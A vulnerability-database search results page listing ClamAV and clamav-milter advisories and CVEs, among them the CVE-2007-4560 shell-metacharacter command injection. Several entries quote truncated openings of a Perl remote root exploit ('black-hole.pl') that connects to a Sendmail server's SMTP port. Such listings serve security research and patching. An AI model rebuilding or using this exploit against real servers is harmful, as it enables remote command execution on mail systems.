29 matches found
Exploit for OS Command Injection in Clam_Anti-Virus Clamav
Sendmail + ClamAV-Milter Exploit CVE-2007-4560 Python RCE e...
EUVD-2009-1596
Malware in sbrugna...
SUSE CVE-2005-2070
The ClamAV Mail fILTER clamav-milter 0.84 through 0.85d, when used in Sendmail using long timeouts, allows remote attackers to cause a denial of service by keeping an open connection, which prevents ClamAV from reloading...
SUSE CVE-2007-4560
clamav-milter in ClamAV before 0.91.2, when run in black hole mode, allows remote attackers to execute arbitrary commands via shell metacharacters that are used in a certain popen call, involving the "recipient field of sendmail."...
SUSE SLES12 Security Update : clamav (SUSE-SU-2020:3729-1)
This update for clamav fixes the following issues : clamav was updated to 0.103.0 to implement jscECO-3010 and bsc1118459. clamd can now reload the signature database without blocking scanning. This multi-threaded database reload improvement was made possible thanks to a community effort. -...
Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit
No description provided by source. black-hole.pl Sendmail w/ clamav-milter Remote Root Exploit Copyright c 2007 Eliteboy use IO::Socket; print Sendmail w/ clamav-milter Remote Root Exploit\n; print Copyright C 2007 Eliteboy\n; if $ARGV != 0 print Give me a host to connect.\n;exit; print Attacking...
CVE-2009-1601
The Ubuntu clamav-milter.init script in clamav-milter before 0.95.1+dfsg-1ubuntu1.2 in Ubuntu 9.04 sets the ownership of the current working directory to the clamav account, which might allow local users to bypass intended access restrictions via read or write operations involving this directory...
CVE-2009-1601
The Ubuntu clamav-milter.init script in clamav-milter before 0.95.1+dfsg-1ubuntu1.2 in Ubuntu 9.04 sets the ownership of the current working directory to the clamav account, which might allow local users to bypass intended access restrictions via read or write operations involving this directory...
Directory traversal
The Ubuntu clamav-milter.init script in clamav-milter before 0.95.1+dfsg-1ubuntu1.2 in Ubuntu 9.04 sets the ownership of the current working directory to the clamav account, which might allow local users to bypass intended access restrictions via read or write operations involving this directory...
CVE-2009-1601
The CVE-2009-1601 details a vulnerability in the Ubuntu clamav-milter.init script: the clamav-milter package (before 0.95.1+dfsg-1ubuntu1.2 on Ubuntu 9.04) causes the current working directory to be owned by the clamav user, potentially letting local users bypass access restrictions via read/writ...
CVE-2009-1601
The Ubuntu clamav-milter.init script in clamav-milter before 0.95.1+dfsg-1ubuntu1.2 in Ubuntu 9.04 sets the ownership of the current working directory to the clamav account, which might allow local users to bypass intended access restrictions via read or write operations involving this directory...
ClamAV 'clamav-milter' Initscript文件权限漏洞
Bugraq ID: 34818 CNCAN ID:CNCAN-2009050603 ClamAV是一款基于unix下的反病毒应用程序。 ClamAV 'clamav-milter' Initscript文件权限设置存在问题,本地攻击者可以利用漏洞进行拒绝服务攻击。 攻击者可以利用漏洞修改部分目录下的文件,导致影响系统完整性并对系统进行进一步攻击。 Clam Anti-Virus ClamAV 0.95.1 厂商解决方案 Ubuntu系统用户可参考如下升级程序: Ubuntu Ubuntu Linux 9.04 amd64 Ubuntu...
USN-770-1: ClamAV vulnerability
A flaw was discovered in the clamav-milter initscript which caused the ownership of the current working directory to be changed to the 'clamav' user. This update attempts to repair the incorrect ownership for standard system directories, but it is recommended that the following command be perform...
Mandriva Linux Security Advisory : clamav (MDVSA-2008:122)
A vulnerability was discovered in ClamAV and corrected with the 0.93.1 release : libclamav/petite.c in ClamAV before 0.93.1 allows remote attackers to cause a denial of service via a crafted Petite file that triggers an out-of-bounds read. CVE-2008-2713 Other bugs have also been corrected in 0.93...
MDVA-2009:018-1 : clamav
This update fixes several issues with clamav: - update unexpectely changes location of clamd socket 46459 - clamav-milter was not built 46555 - Clamav-milter wanted to remove postfix 46556 - Scanning mail with clamav leaves a big temporary folder 46642 - Build fails if invoked with --with milter,...
MDVA-2009:018 : clamav
This update fixes several issues with clamav: - update unexpectely changes location of clamd socket 46459 - clamav-milter was not built 46555 - Clamav-milter wanted to remove postfix 46556 - Scanning mail with clamav leaves a big temporary folder 46642 - Build fails if invoked with --with milter,...
black-hole.txt
black-hole.pl Sendmail w/ clamav-milter Remote Root Exploit Copyright c 2007 Eliteboy use IO::Socket; print "Sendmail w/ clamav-milter Remote Root Exploit\n"; print "Copyright C 2007 Eliteboy\n"; if $ARGV != 0 print "Give me a host to connect.\n";exit; print "Attacking $ARGV0...\n"; $sock =...
Sendmail with clamav-milter < 0.91.2 Remote Root Exploit
No description provided by source. black-hole.pl Sendmail w/ clamav-milter Remote Root Exploit Copyright c 2007 Eliteboy use IO::Socket; print "Sendmail w/ clamav-milter Remote Root Exploit\n"; print "Copyright C 2007 Eliteboy\n"; if $ARGV != 0 print "Give me a host to connect.\n";exit;...
Sendmail with clamav-milter < 0.91.2 Remote Root Exploit
Exploit for multiple platform in category remote exploits ======================================================== Sendmail with clamav-milter newPeerAddr = $ARGV0, PeerPort = '25', Proto = 'tcp'; print $sock "ehlo you\r\n"; print $sock "mail from: \r\n"; print $sock "rcpt to:...
Sendmail with clamav-milter 0.91.2 - Remote Command Execution
Sendmail with clamav-milter 0.91.2 - Remote Command Execution black-hole.pl Sendmail w/ clamav-milter Remote Root Exploit Copyright c 2007 Eliteboy use IO::Socket; print "Sendmail w/ clamav-milter Remote Root Exploit\n"; print "Copyright C 2007 Eliteboy\n"; if $ARGV != 0 print "Give me a host to...